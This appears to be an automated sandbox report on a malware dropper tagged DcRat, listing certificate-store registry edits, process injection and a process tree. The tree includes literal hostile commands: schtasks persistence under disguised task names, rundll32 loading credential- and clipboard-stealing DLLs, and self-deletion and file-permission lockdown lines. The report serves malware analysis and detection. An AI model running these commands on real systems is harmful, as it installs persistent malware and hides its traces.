Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	4363463463464363463463463.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b0b000000010000001600000047006c006f00620061006c005300690067006e0000005300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802020f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	4363463463464363463463463.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 190000000100000010000000a823b4a20180beb460cab955c24d7e210f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c0400000001000000100000003e455215095192e1b75d379fb187298a200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	4363463463464363463463463.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	4363463463464363463463463.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

vbc.exee756885f12abdf5cc8450232691a4f55c1e524262825a4a00ced4f004a2c69c1.exe

pid	process
2952	vbc.exe
1072	e756885f12abdf5cc8450232691a4f55c1e524262825a4a00ced4f004a2c69c1.exe
1072	e756885f12abdf5cc8450232691a4f55c1e524262825a4a00ced4f004a2c69c1.exe
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216
1216

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

e756885f12abdf5cc8450232691a4f55c1e524262825a4a00ced4f004a2c69c1.exe

pid process

1072 e756885f12abdf5cc8450232691a4f55c1e524262825a4a00ced4f004a2c69c1.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

4363463463464363463463463.exevbc.exe

description pid process

Token: SeDebugPrivilege 2916 4363463463464363463463463.exe
Token: SeDebugPrivilege 2952 vbc.exe
Suspicious use of FindShellTrayWindow 4 IoCs

Processes:

tuc2.tmpGo.exe

pid process

2220 tuc2.tmp
2248 Go.exe
1216
1216
Suspicious use of SendNotifyMessage 1 IoCs

Processes:

Go.exe

pid process

2248 Go.exe

pid	process
1072	e756885f12abdf5cc8450232691a4f55c1e524262825a4a00ced4f004a2c69c1.exe

description	pid	process
Token: SeDebugPrivilege	2916	4363463463464363463463463.exe
Token: SeDebugPrivilege	2952	vbc.exe

pid	process
2220	tuc2.tmp
2248	Go.exe
1216
1216

pid	process
2248	Go.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

4363463463464363463463463.exeeasy.exetuc2.exetuc2.tmpschtasks.exeGo.exe

description	pid	process	target process
PID 2916 wrote to memory of 2812	2916	4363463463464363463463463.exe	easy.exe
PID 2916 wrote to memory of 2812	2916	4363463463464363463463463.exe	easy.exe
PID 2916 wrote to memory of 2812	2916	4363463463464363463463463.exe	easy.exe
PID 2916 wrote to memory of 2812	2916	4363463463464363463463463.exe	easy.exe
PID 2916 wrote to memory of 2812	2916	4363463463464363463463463.exe	easy.exe
PID 2916 wrote to memory of 2812	2916	4363463463464363463463463.exe	easy.exe
PID 2916 wrote to memory of 2812	2916	4363463463464363463463463.exe	easy.exe
PID 2812 wrote to memory of 2952	2812	easy.exe	vbc.exe
PID 2812 wrote to memory of 2952	2812	easy.exe	vbc.exe
PID 2812 wrote to memory of 2952	2812	easy.exe	vbc.exe
PID 2812 wrote to memory of 2952	2812	easy.exe	vbc.exe
PID 2812 wrote to memory of 2952	2812	easy.exe	vbc.exe
PID 2812 wrote to memory of 2952	2812	easy.exe	vbc.exe
PID 2812 wrote to memory of 2952	2812	easy.exe	vbc.exe
PID 2812 wrote to memory of 2952	2812	easy.exe	vbc.exe
PID 2812 wrote to memory of 2952	2812	easy.exe	vbc.exe
PID 2916 wrote to memory of 708	2916	4363463463464363463463463.exe	tuc2.exe
PID 2916 wrote to memory of 708	2916	4363463463464363463463463.exe	tuc2.exe
PID 2916 wrote to memory of 708	2916	4363463463464363463463463.exe	tuc2.exe
PID 2916 wrote to memory of 708	2916	4363463463464363463463463.exe	tuc2.exe
PID 2916 wrote to memory of 708	2916	4363463463464363463463463.exe	tuc2.exe
PID 2916 wrote to memory of 708	2916	4363463463464363463463463.exe	tuc2.exe
PID 2916 wrote to memory of 708	2916	4363463463464363463463463.exe	tuc2.exe
PID 708 wrote to memory of 2220	708	tuc2.exe	tuc2.tmp
PID 708 wrote to memory of 2220	708	tuc2.exe	tuc2.tmp
PID 708 wrote to memory of 2220	708	tuc2.exe	tuc2.tmp
PID 708 wrote to memory of 2220	708	tuc2.exe	tuc2.tmp
PID 708 wrote to memory of 2220	708	tuc2.exe	tuc2.tmp
PID 708 wrote to memory of 2220	708	tuc2.exe	tuc2.tmp
PID 708 wrote to memory of 2220	708	tuc2.exe	tuc2.tmp
PID 2220 wrote to memory of 2600	2220	tuc2.tmp	schtasks.exe
PID 2220 wrote to memory of 2600	2220	tuc2.tmp	schtasks.exe
PID 2220 wrote to memory of 2600	2220	tuc2.tmp	schtasks.exe
PID 2220 wrote to memory of 2600	2220	tuc2.tmp	schtasks.exe
PID 2220 wrote to memory of 2780	2220	tuc2.tmp	qtlinkmaster.exe
PID 2220 wrote to memory of 2780	2220	tuc2.tmp	qtlinkmaster.exe
PID 2220 wrote to memory of 2780	2220	tuc2.tmp	qtlinkmaster.exe
PID 2220 wrote to memory of 2780	2220	tuc2.tmp	qtlinkmaster.exe
PID 2600 wrote to memory of 2512	2600	schtasks.exe	schtasks.exe
PID 2600 wrote to memory of 2512	2600	schtasks.exe	schtasks.exe
PID 2600 wrote to memory of 2512	2600	schtasks.exe	schtasks.exe
PID 2600 wrote to memory of 2512	2600	schtasks.exe	schtasks.exe
PID 2220 wrote to memory of 2640	2220	tuc2.tmp	qtlinkmaster.exe
PID 2220 wrote to memory of 2640	2220	tuc2.tmp	qtlinkmaster.exe
PID 2220 wrote to memory of 2640	2220	tuc2.tmp	qtlinkmaster.exe
PID 2220 wrote to memory of 2640	2220	tuc2.tmp	qtlinkmaster.exe
PID 2916 wrote to memory of 1508	2916	4363463463464363463463463.exe	iexplore.exe
PID 2916 wrote to memory of 1508	2916	4363463463464363463463463.exe	iexplore.exe
PID 2916 wrote to memory of 1508	2916	4363463463464363463463463.exe	iexplore.exe
PID 2916 wrote to memory of 1508	2916	4363463463464363463463463.exe	iexplore.exe
PID 2916 wrote to memory of 2536	2916	4363463463464363463463463.exe	Go.exe
PID 2916 wrote to memory of 2536	2916	4363463463464363463463463.exe	Go.exe
PID 2916 wrote to memory of 2536	2916	4363463463464363463463463.exe	Go.exe
PID 2916 wrote to memory of 2536	2916	4363463463464363463463463.exe	Go.exe
PID 1380 wrote to memory of 2248	1380	Go.exe	Go.exe
PID 1380 wrote to memory of 2248	1380	Go.exe	Go.exe
PID 1380 wrote to memory of 2248	1380	Go.exe	Go.exe
PID 2916 wrote to memory of 1020	2916	4363463463464363463463463.exe	e756885f12abdf5cc8450232691a4f55c1e524262825a4a00ced4f004a2c69c1.exe
PID 2916 wrote to memory of 1020	2916	4363463463464363463463463.exe	e756885f12abdf5cc8450232691a4f55c1e524262825a4a00ced4f004a2c69c1.exe
PID 2916 wrote to memory of 1020	2916	4363463463464363463463463.exe	e756885f12abdf5cc8450232691a4f55c1e524262825a4a00ced4f004a2c69c1.exe
PID 2916 wrote to memory of 1020	2916	4363463463464363463463463.exe	e756885f12abdf5cc8450232691a4f55c1e524262825a4a00ced4f004a2c69c1.exe
PID 2916 wrote to memory of 2812	2916	4363463463464363463463463.exe	easy.exe
PID 2916 wrote to memory of 2812	2916	4363463463464363463463463.exe	easy.exe
PID 2916 wrote to memory of 2812	2916	4363463463464363463463463.exe	easy.exe

System policy modification 1 TTPs 2 IoCs

evasion

Modify Registry

T1112

Processes:

Go.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	Go.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\SoftwareSASGeneration = "1"	Go.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
1⤵
- DcRat
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2916
- C:\Users\Admin\AppData\Local\Temp\Files\pdf.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\pdf.exe"
  2⤵
  PID:2812
- C:\Users\Admin\AppData\Local\Temp\Files\tuc2.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\tuc2.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:708
- C:\Users\Admin\AppData\Local\Temp\Files\Setup3.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Setup3.exe"
  2⤵
  PID:1508
- C:\Users\Admin\AppData\Local\Temp\Files\Go.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Go.exe"
  2⤵
  - Executes dropped EXE
  - System policy modification
  PID:2536
- C:\Users\Admin\AppData\Local\Temp\Files\e756885f12abdf5cc8450232691a4f55c1e524262825a4a00ced4f004a2c69c1.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\e756885f12abdf5cc8450232691a4f55c1e524262825a4a00ced4f004a2c69c1.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  PID:1020
- - C:\Users\Admin\AppData\Local\Temp\Files\e756885f12abdf5cc8450232691a4f55c1e524262825a4a00ced4f004a2c69c1.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\e756885f12abdf5cc8450232691a4f55c1e524262825a4a00ced4f004a2c69c1.exe"
    3⤵
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    PID:1072
- C:\Users\Admin\AppData\Local\Temp\Files\easy.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\easy.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:2812
- C:\Users\Admin\AppData\Local\Temp\Files\loader.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\loader.exe"
  2⤵
  PID:2568
- C:\Users\Admin\AppData\Local\Temp\Files\7120.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\7120.exe"
  2⤵
  PID:1604
- C:\Users\Admin\AppData\Local\Temp\Files\cp.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\cp.exe"
  2⤵
  PID:3816
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\s2y0.0.bat" "
    3⤵
    PID:4308
  - - C:\ProgramData\pinterests\XRJNZC.exe
      "C:\ProgramData\pinterests\XRJNZC.exe"
      4⤵
      PID:4284
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /RL HIGHEST /tn "XRJNZC" /tr C:\ProgramData\pinterests\XRJNZC.exe /f
        5⤵
        DcRat
        Creates scheduled task(s)
        
        PID:2872
- C:\Users\Admin\AppData\Local\Temp\Files\ama.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ama.exe"
  2⤵
  PID:2792
- - C:\Users\Admin\AppData\Local\Temp\4fdb51ccdc\Utsysc.exe
    "C:\Users\Admin\AppData\Local\Temp\4fdb51ccdc\Utsysc.exe"
    3⤵
    PID:2904
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\Admin\AppData\Local\Temp\4fdb51ccdc\Utsysc.exe" /F
      4⤵
      DcRat
      Creates scheduled task(s)
      PID:4952
  - - C:\Windows\SysWOW64\rundll32.exe
      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\80c6bf70bf3f8f\cred64.dll, Main
      4⤵
      PID:4464
  - - C:\Windows\SysWOW64\rundll32.exe
      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\80c6bf70bf3f8f\clip64.dll, Main
      4⤵
      PID:2944
- C:\Users\Admin\AppData\Local\Temp\Files\ma.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ma.exe"
  2⤵
  PID:1676
- C:\Users\Admin\AppData\Local\Temp\Files\timeSync.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\timeSync.exe"
  2⤵
  PID:4732
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Files\timeSync.exe" & del "C:\ProgramData\*.dll"" & exit
    3⤵
    PID:3844
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 5
      4⤵
      Delays execution with timeout.exe
      PID:3976
- C:\Users\Admin\AppData\Local\Temp\Files\lve.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\lve.exe"
  2⤵
  PID:2964
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im rundll32.exe
    3⤵
    - Kills process with taskkill
    PID:1996
- C:\Users\Admin\AppData\Local\Temp\Files\WatchDog.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\WatchDog.exe"
  2⤵
  PID:4528
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4528 -s 820
    3⤵
    - Program crash
    PID:1864
- C:\Users\Admin\AppData\Local\Temp\Files\891b6cff6879ab69ae185a5956987ec46daaf434c60c93589c9ac06e4a4f7005.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\891b6cff6879ab69ae185a5956987ec46daaf434c60c93589c9ac06e4a4f7005.exe"
  2⤵
  PID:3016
- C:\Users\Admin\AppData\Local\Temp\Files\amd.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\amd.exe"
  2⤵
  PID:3620
- - C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe
    "C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe"
    3⤵
    PID:3804
- C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"
  2⤵
  PID:4888
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:956
- C:\Users\Admin\AppData\Local\Temp\Files\Posh_v2_dropper_x64.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Posh_v2_dropper_x64.exe"
  2⤵
  PID:4024
- C:\Users\Admin\AppData\Local\Temp\Files\WILD_PRIDE.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\WILD_PRIDE.exe"
  2⤵
  PID:3228
- C:\Users\Admin\AppData\Local\Temp\Files\btpc.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\btpc.exe"
  2⤵
  PID:4684

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2952

C:\Users\Admin\AppData\Local\Temp\is-1IVLM.tmp\tuc2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-1IVLM.tmp\tuc2.tmp" /SL5="$301AE,6178507,109568,C:\Users\Admin\AppData\Local\Temp\Files\tuc2.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2220
- C:\Program Files (x86)\QtLinkMaster\qtlinkmaster.exe
  "C:\Program Files (x86)\QtLinkMaster\qtlinkmaster.exe" -i
  2⤵
  - Executes dropped EXE
  PID:2780
- C:\Windows\SysWOW64\net.exe
  "C:\Windows\system32\net.exe" helpmsg 27
  2⤵
  PID:2600
- C:\Program Files (x86)\QtLinkMaster\qtlinkmaster.exe
  "C:\Program Files (x86)\QtLinkMaster\qtlinkmaster.exe" -s
  2⤵
  - Executes dropped EXE
  PID:2640

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 helpmsg 27
1⤵
PID:2512

C:\Users\Admin\AppData\Local\Temp\Files\Go.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Go.exe" Global\GotoHTTP_1
1⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2248
- C:\Windows\system32\taskmgr.exe
  taskmgr
  2⤵
  PID:4572
- - C:\Windows\system32\taskkill.exe
    "C:\Windows\system32\taskkill.exe" /f /im iexp8
    3⤵
    - Kills process with taskkill
    PID:4164

C:\Users\Admin\AppData\Local\Temp\Files\Go.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Go.exe" service
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1380

C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
1⤵
PID:1760

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\478B.bat" "
1⤵
PID:3032

C:\Users\Admin\AppData\Local\Temp\9741.exe
C:\Users\Admin\AppData\Local\Temp\9741.exe
1⤵
PID:1772
- C:\Users\Admin\AppData\Local\Temp\9741.exe
  C:\Users\Admin\AppData\Local\Temp\9741.exe
  2⤵
  - Executes dropped EXE
  PID:1824
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Users\Admin\AppData\Local\4f3fe6ac-979b-4df8-b348-19a5ddbe614f" /deny *S-1-1-0:(OI)(CI)(DE,DC)
    3⤵
    - Modifies file permissions
    PID:2816
- - C:\Users\Admin\AppData\Local\Temp\9741.exe
    "C:\Users\Admin\AppData\Local\Temp\9741.exe" --Admin IsNotAutoStart IsNotTask
    3⤵
    PID:1932
  - - C:\Users\Admin\AppData\Local\Temp\9741.exe
      "C:\Users\Admin\AppData\Local\Temp\9741.exe" --Admin IsNotAutoStart IsNotTask
      4⤵
      PID:1512
    - - C:\Users\Admin\AppData\Local\38762278-4e7e-46ce-b3cb-46efd079c9f7\build2.exe
        
        "C:\Users\Admin\AppData\Local\38762278-4e7e-46ce-b3cb-46efd079c9f7\build2.exe"
        5⤵
        
        PID:1756
      - C:\Users\Admin\AppData\Local\38762278-4e7e-46ce-b3cb-46efd079c9f7\build2.exe
        
        "C:\Users\Admin\AppData\Local\38762278-4e7e-46ce-b3cb-46efd079c9f7\build2.exe"
        6⤵
        
        PID:1704
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1704 -s 1364
        7⤵
        Program crash
        
        PID:4332
    - - C:\Users\Admin\AppData\Local\38762278-4e7e-46ce-b3cb-46efd079c9f7\build3.exe
        
        "C:\Users\Admin\AppData\Local\38762278-4e7e-46ce-b3cb-46efd079c9f7\build3.exe"
        5⤵
        
        PID:4072
      - C:\Users\Admin\AppData\Local\38762278-4e7e-46ce-b3cb-46efd079c9f7\build3.exe
        
        "C:\Users\Admin\AppData\Local\38762278-4e7e-46ce-b3cb-46efd079c9f7\build3.exe"
        6⤵
        
        PID:4512
        
        C:\Windows\SysWOW64\schtasks.exe
        
        /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
        7⤵
        DcRat
        Creates scheduled task(s)
        
        PID:3196
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1772 CREDAT:275457 /prefetch:2
  2⤵
  PID:3220

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\reviewintobrokerHost\aUs3pwix5Vd1U6IYzTsfZ9E8dEV3MF.vbe"
1⤵
PID:1700
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Roaming\reviewintobrokerHost\WJgXY0RCE6WdWGoPyLk7f.bat" "
  2⤵
  PID:2784

C:\Users\Admin\AppData\Local\Temp\ARA.exe
"C:\Users\Admin\AppData\Local\Temp\ARA.exe"
1⤵
PID:1556

C:\Users\Admin\AppData\Local\Temp\rhsgn_protected.exe
"C:\Users\Admin\AppData\Local\Temp\rhsgn_protected.exe"
1⤵
PID:2692

C:\Users\Admin\AppData\Roaming\reviewintobrokerHost\Msblockreview.exe
"C:\Users\Admin\AppData\Roaming\reviewintobrokerHost\Msblockreview.exe"
1⤵
PID:1164
- C:\Program Files\VideoLAN\VLC\lua\sd\lsm.exe
  "C:\Program Files\VideoLAN\VLC\lua\sd\lsm.exe"
  2⤵
  PID:2708

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\spoolsv.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:1696

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\it-IT\conhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:2600

C:\Windows\system32\schtasks.exe
